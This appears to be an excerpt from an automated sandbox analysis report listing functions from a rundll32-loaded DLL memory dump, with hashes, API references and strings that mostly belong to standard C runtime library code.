Instruction Fuzzy Hash: 0AA02230202A00CF8F00AF30B32830C3AE8BACBEE230080A8E003C2280EB308030EB00

Function 6E4EB881 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08556a0b7e2f291a7373366f56b938cabd7d16554c8359c94350950b64b82922
Instruction ID: 30442059450b15c47f72a619b91adedc468a4ddcead852fbbd162aa60eea2271
Opcode Fuzzy Hash: 08556a0b7e2f291a7373366f56b938cabd7d16554c8359c94350950b64b82922
Instruction Fuzzy Hash: 6CE08C33A11228EBCB24CBE8C950E8AB3ECFB44B11B11449BF511E3604C270DE00C7D0

Function 6E4EDDF0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6E4EDE34

Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE24D
Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE25F
Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE271
Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE283
Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE295
Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE2A7
Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE2B9
Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE2CB
Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE2DD
Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE2EF
Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE301
Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE313
Part of subcall function 6E4EE230: _free.LIBCMT ref: 6E4EE325

_free.LIBCMT ref: 6E4EDE29

Part of subcall function 6E4EB90F: HeapFree.KERNEL32(00000000,00000000,?,6E4EAB0E), ref: 6E4EB925
Part of subcall function 6E4EB90F: GetLastError.KERNEL32(?,?,6E4EAB0E), ref: 6E4EB937

_free.LIBCMT ref: 6E4EDE4B
_free.LIBCMT ref: 6E4EDE60
_free.LIBCMT ref: 6E4EDE6B
_free.LIBCMT ref: 6E4EDE8D
_free.LIBCMT ref: 6E4EDEA0
_free.LIBCMT ref: 6E4EDEAE
_free.LIBCMT ref: 6E4EDEB9
_free.LIBCMT ref: 6E4EDEF1
_free.LIBCMT ref: 6E4EDEF8
_free.LIBCMT ref: 6E4EDF15
_free.LIBCMT ref: 6E4EDF2D

Strings

On, xrefs: 6E4EDE06

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: On
API String ID: 161543041-2957224786
Opcode ID: c1e1773b61b96a805fdfd28b352e8d8510fe8186f7c1b66e8cbc52f38f828ce0
Instruction ID: c178891b9863b2489760167cbfbb5369725a8e4f73011a040e2f7077bb6a76de
Opcode Fuzzy Hash: c1e1773b61b96a805fdfd28b352e8d8510fe8186f7c1b66e8cbc52f38f828ce0
Instruction Fuzzy Hash: A1316B71604B059FEB609EB8D844F9B73E8AF81356F11581FE099D7A94DF30ED508B60

Function 6E4E82C0 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6E4E83BD
type_info::operator==.LIBVCRUNTIME ref: 6E4E83DF
___TypeMatch.LIBVCRUNTIME ref: 6E4E84EE
IsInExceptionSpec.LIBVCRUNTIME ref: 6E4E85C0
_UnwindNestedFrames.LIBCMT ref: 6E4E8644
CallUnexpected.LIBVCRUNTIME ref: 6E4E865F

Strings

csm, xrefs: 6E4E82FD
csm, xrefs: 6E4E836A
csm, xrefs: 6E4E8416

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 11a84ff56438661040f9e5162cae448e453253830e9996b8e9069bd11d07cbe1
Instruction ID: 0c07f0d98bb56358e085ca4478ad4d6c639f308eb610c6cf8f9fad5c5eeaca15
Opcode Fuzzy Hash: 11a84ff56438661040f9e5162cae448e453253830e9996b8e9069bd11d07cbe1
Instruction Fuzzy Hash: 73B15571804209EFCF09CFF4D880D9EBBB9FF48316B18495AE8116BA56D731DA52CB91

Function 6E4EB188 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E4EB19E

Part of subcall function 6E4EB90F: HeapFree.KERNEL32(00000000,00000000,?,6E4EAB0E), ref: 6E4EB925
Part of subcall function 6E4EB90F: GetLastError.KERNEL32(?,?,6E4EAB0E), ref: 6E4EB937

_free.LIBCMT ref: 6E4EB1AA
_free.LIBCMT ref: 6E4EB1B5
_free.LIBCMT ref: 6E4EB1C0
_free.LIBCMT ref: 6E4EB1CB
_free.LIBCMT ref: 6E4EB1D6
_free.LIBCMT ref: 6E4EB1E1
_free.LIBCMT ref: 6E4EB1EC
_free.LIBCMT ref: 6E4EB1F7
_free.LIBCMT ref: 6E4EB205

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 85189d3e94b1de6c4ae1cd4779f6ec955098eb15fdd033c9a489792000e9679f
Instruction ID: fbecfb540cf97d769c8ffa22f9853574009456102298221432c85534ebe3a412
Opcode Fuzzy Hash: 85189d3e94b1de6c4ae1cd4779f6ec955098eb15fdd033c9a489792000e9679f
Instruction Fuzzy Hash: 0421A97690420CAFCB51EFE4C880DDE7BB9BF08245F0145AAF5559B525EB31EB44DB80

Function 6E4E7C10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6E4E7C47
___except_validate_context_record.LIBVCRUNTIME ref: 6E4E7C4F
_ValidateLocalCookies.LIBCMT ref: 6E4E7CD8
__IsNonwritableInCurrentImage.LIBCMT ref: 6E4E7D03
_ValidateLocalCookies.LIBCMT ref: 6E4E7D58

Strings

csm, xrefs: 6E4E7CED

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 7edcb0b0895d91b98426caa2d2023f65695e649ae213008fea50837eab416127
Instruction ID: 784767e2998d0acd2c5e9c64c6a07b2c5d7c0984fc2b30612e3a57b35d1501eb
Opcode Fuzzy Hash: 7edcb0b0895d91b98426caa2d2023f65695e649ae213008fea50837eab416127
Instruction Fuzzy Hash: 054193349041099FCF00CFB8D884E9E7BB9FF45329F14849AE9145B792D7319A56CBD1

Function 6E4ECE36 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 6E4ECE8D
ext-ms-, xrefs: 6E4ECEA1

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 58e1b6f226e08f73c52fcc5413194ba4d58795a28a99e1d22ab591a0d911879a
Instruction ID: fb5a11607b100df5050d42999cfa725e529e507bd1b958b179243a5b668381dc
Opcode Fuzzy Hash: 58e1b6f226e08f73c52fcc5413194ba4d58795a28a99e1d22ab591a0d911879a
Instruction Fuzzy Hash: C521F932B45691EFCB119BFD9C40F1A3B69AF42BA2F120552E811EF780D670EC00C6E0

Function 6E4EE3CF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6E4EE397: _free.LIBCMT ref: 6E4EE3BC

_free.LIBCMT ref: 6E4EE41D

Part of subcall function 6E4EB90F: HeapFree.KERNEL32(00000000,00000000,?,6E4EAB0E), ref: 6E4EB925
Part of subcall function 6E4EB90F: GetLastError.KERNEL32(?,?,6E4EAB0E), ref: 6E4EB937

_free.LIBCMT ref: 6E4EE428
_free.LIBCMT ref: 6E4EE433
_free.LIBCMT ref: 6E4EE487
_free.LIBCMT ref: 6E4EE492
_free.LIBCMT ref: 6E4EE49D
_free.LIBCMT ref: 6E4EE4A8

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 721850df8d4c47503c6824c909b1dca4e5bf9ba2e63f805735e24cd8dbef12be
Instruction ID: c5bc92bbf143b960fbadff0226d73f05660827e3270e299d74b80c580fe63759
Opcode Fuzzy Hash: 721850df8d4c47503c6824c909b1dca4e5bf9ba2e63f805735e24cd8dbef12be
Instruction Fuzzy Hash: 0F11EC71544F08AAD631ABF0CC85FCB7F9CAF04706F404C1EA399A6998DB66FA148694

Function 6E4EF25C Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6E4EF2A4
__fassign.LIBCMT ref: 6E4EF489
__fassign.LIBCMT ref: 6E4EF4A6
WriteFile.KERNEL32(?,6E4ED927,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E4EF4EE
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E4EF52E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E4EF5D6

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 7db82080b386608e509b8a0ee49e8c0935b921c69a219fb95da8312ba621a2d6
Instruction ID: 43adde79bdc237c48559575a26306b26a8cc9321a02c71ee51943bf9679551b6
Opcode Fuzzy Hash: 7db82080b386608e509b8a0ee49e8c0935b921c69a219fb95da8312ba621a2d6
Instruction Fuzzy Hash: FFC1AB71D022588FCB10CFF8E8809EDBBB5BF59318F28416AE815B7742D6319902CF60

Function 6E4E7F89 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6E4E7B9E,6E4E68B4,6E4E6D4B,?,6E4E6F85,?,00000001,?,?,00000001,?,6E4FC7F8,0000000C,6E4E707E), ref: 6E4E7F97
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E4E7FA5
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E4E7FBE
SetLastError.KERNEL32(00000000,6E4E6F85,?,00000001,?,?,00000001,?,6E4FC7F8,0000000C,6E4E707E,?,00000001,?), ref: 6E4E8010

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: c5389a214af719e5886047e3e69c184cb4e566272caa765644ccf576059d2c51
Instruction ID: e835c9e8690ff804bfcc6ab0f7d1522f44cbe7bb363666e9c7fbfb5479092837
Opcode Fuzzy Hash: c5389a214af719e5886047e3e69c184cb4e566272caa765644ccf576059d2c51
Instruction Fuzzy Hash: EB01D83311C6226DAA652AF47CC8E572A59DB86B7F3210F6FF120859D5EF53481171C4

Function 6E4EC17B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6E4EC180

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 52f3ccd079f20d38b35bb16dcb0e07cfbfc452db2610608eb599883ffa707967
Instruction ID: 40339ce6d8facc59e76980bbff54ee1739f286eae4ae544e6c10a203f05f13af
Opcode Fuzzy Hash: 52f3ccd079f20d38b35bb16dcb0e07cfbfc452db2610608eb599883ffa707967
Instruction Fuzzy Hash: 7A21A771A14646AFDB109FF99C80DAB7B6DAF8136A710491BF825DBA44E730EC1087E1

Function 6E4E8FF7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6E4E90B8,00000000,?,00000001,00000000,?,6E4E912F,00000001,FlsFree,6E4F6E3C,FlsFree,00000000), ref: 6E4E9087

Strings

api-ms-, xrefs: 6E4E9047

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 6a8fe43c421d66abb52ea570a3b7e2c0e9f5772e6bb33da264864765039c40f2
Instruction ID: 1b7b40eb87d5e7177b630716c05183dd71d49114fa242483bc3a9a191eaf12c8
Opcode Fuzzy Hash: 6a8fe43c421d66abb52ea570a3b7e2c0e9f5772e6bb33da264864765039c40f2
Instruction Fuzzy Hash: 99110A32A55621AFDF12AFF8AC40F5933A89F42B71F510292EB12E77C4D771E90086E1

Function 6E4EA2D9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6E4EA28B,?,?,6E4EA253,?,00000001,?), ref: 6E4EA2EE
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E4EA301
FreeLibrary.KERNEL32(00000000,?,?,6E4EA28B,?,?,6E4EA253,?,00000001,?), ref: 6E4EA324

Strings

CorExitProcess, xrefs: 6E4EA2F9
mscoree.dll, xrefs: 6E4EA2E7

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a8c38a204ecf959581e46280ddfb415f1a1ea12e8a63b783b4b717caea6bd6d3
Instruction ID: 877b47147046ef65a8b159052d557c6074e309242971430d227f144ef6845cd6
Opcode Fuzzy Hash: a8c38a204ecf959581e46280ddfb415f1a1ea12e8a63b783b4b717caea6bd6d3
Instruction Fuzzy Hash: 4FF01231911519FBDF01AFB1E919F9E7A79EF81B56F104095E802E2250CB318A11EBE1

Function 6E4EE32E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 6E4EE346

Part of subcall function 6E4EB90F: HeapFree.KERNEL32(00000000,00000000,?,6E4EAB0E), ref: 6E4EB925
Part of subcall function 6E4EB90F: GetLastError.KERNEL32(?,?,6E4EAB0E), ref: 6E4EB937

_free.LIBCMT ref: 6E4EE358
_free.LIBCMT ref: 6E4EE36A
_free.LIBCMT ref: 6E4EE37C
_free.LIBCMT ref: 6E4EE38E

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9872c4ead130b75454031600e811c5e8895a98bd8b306555f5915ee4750a6115
Instruction ID: 462296fb594a2bff6cbd51e16157a33e3a89c43ede96a4a39bf7517d9540ac58
Opcode Fuzzy Hash: 9872c4ead130b75454031600e811c5e8895a98bd8b306555f5915ee4750a6115
Instruction Fuzzy Hash: 4CF03731400B099BDA60EAF8F0C0D4B73DDAA80A227A02C0AF059D7E44CB25FC908AA4

Function 6E4EBAFF Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E4EBC99

Strings

*?, xrefs: 6E4EBB42

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 19c18ddf14ce9615cfa6117e23dcf04fce62630a8d918e35b75d869d6a8ef9cd
Instruction ID: 7d52e0fa614137528a374aa087535741751ae81ab37cbca76a9e87990a7c1028
Opcode Fuzzy Hash: 19c18ddf14ce9615cfa6117e23dcf04fce62630a8d918e35b75d869d6a8ef9cd
Instruction Fuzzy Hash: 5B615A75D042199FDB24CFA8C8819EEFBF9EF48314B1485AED844E7708D771AE418B90

Function 6E4EDAB4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E4EDAE2
_free.LIBCMT ref: 6E4EDB08

Strings

8On, xrefs: 6E4EDB21
On, xrefs: 6E4EDB6F

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: _free
String ID: 8On$On
API String ID: 269201875-1728545269
Opcode ID: 653d049780954781b7876924b50db85095210295a615906349298bc9a89b286d
Instruction ID: 592d79f9e44ba0b6b6ade8f33d447ce7cdd152511075a1d1295f39252e6ed41b
Opcode Fuzzy Hash: 653d049780954781b7876924b50db85095210295a615906349298bc9a89b286d
Instruction Fuzzy Hash: 93117271A15B104FDB605EB8BC40F463698ABC2B35F580B17E522DBBD5E370D9428A85

Function 6E4E8069 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6E4E8130
___AdjustPointer.LIBCMT ref: 6E4E8153
___AdjustPointer.LIBCMT ref: 6E4E81EF

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: bf1764df0267fcea1fd74e848e289ad4558e3a9a8956aff4097b0ef68125d83f
Instruction ID: c4fbac78414a0be6de6f4144d771729d9ee82d593bc7c127caed2eaf378e09e5
Opcode Fuzzy Hash: bf1764df0267fcea1fd74e848e289ad4558e3a9a8956aff4097b0ef68125d83f
Instruction Fuzzy Hash: C051E172604646AFEF158FF1D850FAAB3A8EF08316F18496FE95257B90D731E841C790

Function 6E4EBA13 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6E4EC035: _free.LIBCMT ref: 6E4EC043

Part of subcall function 6E4ECC09: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6E4ED927,6E4EFBE4,0000FDE9,00000000,?,?,?,6E4EF95D,0000FDE9,00000000,?), ref: 6E4ECCB5

GetLastError.KERNEL32 ref: 6E4EBA7B
__dosmaperr.LIBCMT ref: 6E4EBA82
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E4EBAC1
__dosmaperr.LIBCMT ref: 6E4EBAC8

Memory Dump Source

Source File: 00000007.00000002.3795562918.000000006E4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E4E0000, based on PE: true

Associated: 00000007.00000002.3795542724.000000006E4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795590686.000000006E4F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795611871.000000006E4FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000007.00000002.3795633341.000000006E500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6e4e0000_rundll32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 1bf9ddeb5c6ac58624fcd7a58db1d9f02c988c65b5a92cb748bc4323411f3267
Instruction ID: b3bad4225d4a4b820923b74cd315b945da613a8a21c6f3647136c0b829fab440
Opcode Fuzzy Hash: 1bf9ddeb5c6ac58624fcd7a58db1d9f02c988c65b5a92cb748bc4323411f3267
Instruction Fuzzy Hash: 2821C471604705AFDF209FF59884D6BB7ACEF4136A710891AF468A7E48E770DC0187E0

Function 6E4EB2CC Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6E4EF6A4,?,00000001,6E4ED998,?,6E4EFB5E,00000001,?,?,?,6E4ED927,?,00000000), ref: 6E4EB2D1
_free.LIBCMT ref: 6E4EB32E
_free.LIBCMT ref: 6E4EB364
